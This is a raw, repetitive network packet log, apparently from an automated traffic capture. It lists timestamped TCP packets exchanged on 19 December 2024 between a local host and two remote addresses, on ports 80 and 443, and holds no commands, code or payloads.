                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.638492107 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.638501883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.638535976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.640304089 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.640366077 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.640968084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.641002893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.641036987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.641071081 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.641099930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643187046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643223047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643251896 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643258095 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643270016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643292904 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643304110 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643340111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643960953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.643996000 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644006014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644032955 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644045115 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644073963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644752026 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644787073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644814968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644820929 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644830942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.644860983 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645546913 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645600080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645629883 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645633936 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645656109 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645668983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645675898 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.645709038 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.646476030 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.646512985 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.646564007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.706753969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.706809044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.706832886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.706846952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707058907 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707631111 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707675934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707689047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707715988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.707735062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.708170891 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.708250046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709137917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709192991 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709316969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709331036 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709371090 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709702015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709744930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709806919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709851027 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.709992886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710005999 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710019112 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710046053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710073948 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710817099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.710860014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711015940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711030006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711071968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711636066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711963892 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.711963892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712025881 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712275028 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712290049 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712302923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712316990 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.712330103 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713089943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713103056 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713152885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713179111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713596106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713609934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713634968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.713649988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714019060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714032888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714066029 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714081049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714512110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714526892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714539051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714556932 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.714577913 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.715194941 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.715209007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.715221882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.715266943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.715280056 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716006994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716021061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716077089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716321945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716335058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716346979 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716373920 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.716389894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.717312098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.717324972 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.717335939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.717369080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.717425108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718009949 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718024015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718049049 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718076944 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718290091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718357086 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718357086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718369961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718403101 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.718437910 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719151974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719181061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719194889 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719223976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719234943 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719822884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719836950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719877005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.719892979 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720210075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720222950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720237017 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720268011 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720294952 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720938921 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720952988 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720966101 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.720993996 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721021891 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721023083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721693039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721705914 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721718073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721730947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721740961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.721786976 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722248077 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722260952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722270966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722291946 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722317934 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722882986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722896099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.722939968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880309105 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880486965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880497932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880702972 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880727053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880743980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.880805016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.881109953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.881155014 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.882692099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.882704020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.882740021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.882750988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.884335995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.884350061 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.884361982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.884401083 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.884428024 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.885082960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.885121107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.886639118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.886652946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.886692047 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.887197018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.887211084 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.887247086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.887259960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.888457060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.888493061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.889311075 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.889324903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.889336109 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.889358044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.889373064 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.891632080 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.891645908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.891659975 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.891688108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.891710997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892189980 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892204046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892215967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892227888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892235041 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892247915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892277002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.892865896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.893450022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.894454956 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.894469023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.894503117 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.894529104 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895134926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895148993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895183086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895198107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895731926 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895745993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895756960 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895783901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.895796061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896322012 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896334887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896349907 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896363020 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896368980 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896390915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.896414042 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.897134066 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.897146940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.897156954 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.897181034 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.897198915 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.905654907 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.905715942 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.906639099 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.906991005 CET49755443192.168.2.4104.21.67.146
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.907006979 CET44349755104.21.67.146192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915426016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915478945 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915694952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915708065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915719986 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915744066 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.915766001 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916251898 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916263103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916306019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916536093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916548967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916583061 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.916610003 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917222023 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917233944 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917247057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917273998 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917300940 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917690992 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917735100 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917862892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917875051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.917911053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918275118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918323994 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918477058 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918524027 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918535948 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.918576002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919214010 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919265985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919356108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:35.919491053 CET4974380192.168.2.431.41.244.11
